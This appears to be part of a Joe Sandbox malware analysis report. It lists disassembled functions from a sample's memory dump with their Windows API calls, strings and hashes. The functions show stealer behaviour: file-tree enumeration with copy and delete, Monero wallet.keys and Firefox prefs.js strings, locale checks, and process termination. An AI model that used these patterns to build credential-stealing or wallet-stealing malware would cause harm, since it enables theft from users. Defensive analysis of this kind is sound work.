                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
                                  • API String ID: 0-1562099544
                                  • Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction ID: f20b7e8fb1fa7f8470ddabcf9ac0f2e96dc60d388a075d4426e29f16636c7186
                                  • Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
                                  • Instruction Fuzzy Hash: FBE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56
                                  Function 00BAF7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC16B0,00BC0D97), ref: 00BAF81E
                                  • StrCmpCA.SHLWAPI(?,00BC16B4), ref: 00BAF86F
                                  • StrCmpCA.SHLWAPI(?,00BC16B8), ref: 00BAF885
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAFBB1
                                  • FindClose.KERNEL32(000000FF), ref: 00BAFBC3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID: prefs.js
                                  • API String ID: 3334442632-3783873740
                                  • Opcode ID: 6222699e765647de0058176667fe1b7423329bf2de4dec47995d04d5413fce44
                                  • Instruction ID: 9ca9566db32e8fd8d6b33f384fbb177a9cb46cc04617e630caae3f3933e84584
                                  • Opcode Fuzzy Hash: 6222699e765647de0058176667fe1b7423329bf2de4dec47995d04d5413fce44
                                  • Instruction Fuzzy Hash: F7B13271D10108ABCB24FFA4DD96FFE77B9AF55300F4085E8A41A66191EF709B48CB91
                                  Function 00BA1710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC523C,?,?,?,00BC52E4,?,?,00000000,?,00000000), ref: 00BA1963
                                  • StrCmpCA.SHLWAPI(?,00BC538C), ref: 00BA19B3
                                  • StrCmpCA.SHLWAPI(?,00BC5434), ref: 00BA19C9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00BA1D80
                                  • DeleteFileA.KERNEL32(00000000), ref: 00BA1E0A
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BA1E60
                                  • FindClose.KERNEL32(000000FF), ref: 00BA1E72
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 1415058207-1173974218
                                  • Opcode ID: 46737cfc00f68d31c820c07d6cc67f415a80d6672cdfaada932bffb6164fab83
                                  • Instruction ID: 47be8e5d56fc93fc9ad6694863a293629c13c828463f15f4dadd8304eb914c68
                                  • Opcode Fuzzy Hash: 46737cfc00f68d31c820c07d6cc67f415a80d6672cdfaada932bffb6164fab83
                                  • Instruction Fuzzy Hash: 8812CE71D10118ABCF65FB60CCA6EFE77B9AF54300F4045E9A51A66091EFB06B88CF61
                                  Function 00BADF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00BC0C32), ref: 00BADF5E
                                  • StrCmpCA.SHLWAPI(?,00BC15C0), ref: 00BADFAE
                                  • StrCmpCA.SHLWAPI(?,00BC15C4), ref: 00BADFC4
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAE4E0
                                  • FindClose.KERNEL32(000000FF), ref: 00BAE4F2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
                                  • String ID: \*.*
                                  • API String ID: 2325840235-1173974218
                                  • Opcode ID: c6294851f78a216cb4a34972c32663db756b028a34068a0f191aee6de4c49332
                                  • Instruction ID: 9b9f957895346c0a2f962c335708cea82b95e6f6a4da22075edfcf91e6d0dc56
                                  • Opcode Fuzzy Hash: c6294851f78a216cb4a34972c32663db756b028a34068a0f191aee6de4c49332
                                  • Instruction Fuzzy Hash: 42F19F71D24118ABCF25FB60CDA6EFE77B9AF55300F8045D9A01A62091EFB06B89CF51
                                  Function 00BADB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00BC15A8,00BC0BAF), ref: 00BADBEB
                                  • StrCmpCA.SHLWAPI(?,00BC15AC), ref: 00BADC33
                                  • StrCmpCA.SHLWAPI(?,00BC15B0), ref: 00BADC49
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BADECC
                                  • FindClose.KERNEL32(000000FF), ref: 00BADEDE
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
                                  • String ID:
                                  • API String ID: 3334442632-0
                                  • Opcode ID: 4abc06ff11154c10e9615f4a24170a08fb8882d77157844bde9645e78a098e87
                                  • Instruction ID: 3b6e0ca77205167cecbd41f99a548a13d84cc4ab19394eb8470827838dc160e4
                                  • Opcode Fuzzy Hash: 4abc06ff11154c10e9615f4a24170a08fb8882d77157844bde9645e78a098e87
                                  • Instruction Fuzzy Hash: FC915272E00104ABCF14FB74DD96AFD77BDAB95300F4045E8B85B66181EE709B48CBA2
                                  Function 00BB98E0 Relevance: 12.1, APIs: 8, Instructions: 55processCOMMON
                                  Download Yara Rule
                                  APIs
                                  • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00BB9905
                                  • Process32First.KERNEL32(00BA9FDE,00000128), ref: 00BB9919
                                  • Process32Next.KERNEL32(00BA9FDE,00000128), ref: 00BB992E
                                  • StrCmpCA.SHLWAPI(?,00BA9FDE), ref: 00BB9943
                                  • OpenProcess.KERNEL32(00000001,00000000,?), ref: 00BB995C
                                  • TerminateProcess.KERNEL32(00000000,00000000), ref: 00BB997A
                                  • CloseHandle.KERNEL32(00000000), ref: 00BB9987
                                  • CloseHandle.KERNEL32(00BA9FDE), ref: 00BB9993
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
                                  • String ID:
                                  • API String ID: 2696918072-0
                                  • Opcode ID: 0e4e1e5527e0dedfa90815e82dce0cf9e9d8deec541f97731fa0319d873baae2
                                  • Instruction ID: 1599f6dd45254aba9a2276377cac2360cec3c1c52484246d24ae551fcb13ae5a
                                  • Opcode Fuzzy Hash: 0e4e1e5527e0dedfa90815e82dce0cf9e9d8deec541f97731fa0319d873baae2
                                  • Instruction Fuzzy Hash: 50111F75904208AFDB64DFA1DC88BEDB7B8AB48700F1045CCF649B6250D7749A84CF90
                                  Function 00BB7D20 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 114memoryCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                  • GetKeyboardLayoutList.USER32(00000000,00000000,00BC05B7), ref: 00BB7D71
                                  • LocalAlloc.KERNEL32(00000040,?), ref: 00BB7D89
                                  • GetKeyboardLayoutList.USER32(?,00000000), ref: 00BB7D9D
                                  • GetLocaleInfoA.KERNEL32(?,00000002,?,00000200), ref: 00BB7DF2
                                  • LocalFree.KERNEL32(00000000), ref: 00BB7EB2
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: KeyboardLayoutListLocal$AllocFreeInfoLocalelstrcpy
                                  • String ID: /
                                  • API String ID: 3090951853-4001269591
                                  • Opcode ID: b59427387ab00a701c31d1cc0556fd04b173b02969b8b642c0c53f8311497d46
                                  • Instruction ID: f48ea10fff3ccd085b2c523a0e04bf8075aa2a6b6bc10df115edd84a026b69df
                                  • Opcode Fuzzy Hash: b59427387ab00a701c31d1cc0556fd04b173b02969b8b642c0c53f8311497d46
                                  • Instruction Fuzzy Hash: DC413C71954218ABCB24DB94DC99BFEB7B8FF54700F1041D9E00A66291DBB46F88CFA1
                                  Function 00BAE530 Relevance: 9.3, APIs: 4, Strings: 1, Instructions: 514fileCOMMON
                                  Download Yara Rule
                                  APIs
                                    • Part of subcall function 00BBAA50: lstrcpy.KERNEL32(00BC0E1A,00000000), ref: 00BBAA98
                                    • Part of subcall function 00BBAC30: lstrcpy.KERNEL32(00000000,?), ref: 00BBAC82
                                    • Part of subcall function 00BBAC30: lstrcat.KERNEL32(00000000), ref: 00BBAC92
                                    • Part of subcall function 00BBACC0: lstrlen.KERNEL32(?,013095E8,?,\Monero\wallet.keys,00BC0E1A), ref: 00BBACD5
                                    • Part of subcall function 00BBACC0: lstrcpy.KERNEL32(00000000), ref: 00BBAD14
                                    • Part of subcall function 00BBACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00BBAD22
                                    • Part of subcall function 00BBABB0: lstrcpy.KERNEL32(?,00BC0E1A), ref: 00BBAC15
                                  • FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,\*.*,00BC0D79), ref: 00BAE5A2
                                  • StrCmpCA.SHLWAPI(?,00BC15F0), ref: 00BAE5F2
                                  • StrCmpCA.SHLWAPI(?,00BC15F4), ref: 00BAE608
                                  • FindNextFileA.KERNEL32(000000FF,?), ref: 00BAECDF
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileFindlstrcat$FirstNextlstrlen
                                  • String ID: \*.*
                                  • API String ID: 433455689-1173974218
                                  • Opcode ID: fb834d342011b8366e26f2221a7c8ec41137ccf815681dc216ef8f2c29226433
                                  • Instruction ID: d4e1769243b8006e73698265e9ad2544cebca86b426b4767c5476c6cbc359150
                                  • Opcode Fuzzy Hash: fb834d342011b8366e26f2221a7c8ec41137ccf815681dc216ef8f2c29226433
                                  • Instruction Fuzzy Hash: 0D12F271D10118ABCF24FB60DDA6EFD77B9AF54300F4045E9B51A66091EEB06B48CFA2
                                  Function 00FF6E94 Relevance: 9.2, Strings: 6, Instructions: 1698COMMON
                                  Download Yara Rule
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2175839429.0000000000E8A000.00000040.00000001.01000000.00000003.sdmp, Offset: 00BA0000, based on PE: true
                                  • Associated: 00000000.00000002.2175605454.0000000000BA0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BA1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000BCC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CDD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000CE9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000D0E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175620946.0000000000E76000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001007000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.00000000010E1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.0000000001107000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000110D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2175839429.000000000111D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176090990.000000000111E000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176203878.00000000012B2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2176220401.00000000012B3000.00000080.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_ba0000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID:
                                  • String ID: &r7~$./$.m$Gl}$WD/9${ /_
                                  • API String ID: 0-3525660750
                                  • Opcode ID: 9ebccf49d38ea5a6ccc082a8be838188098a4c8f00cd31a98fbf311526efb029
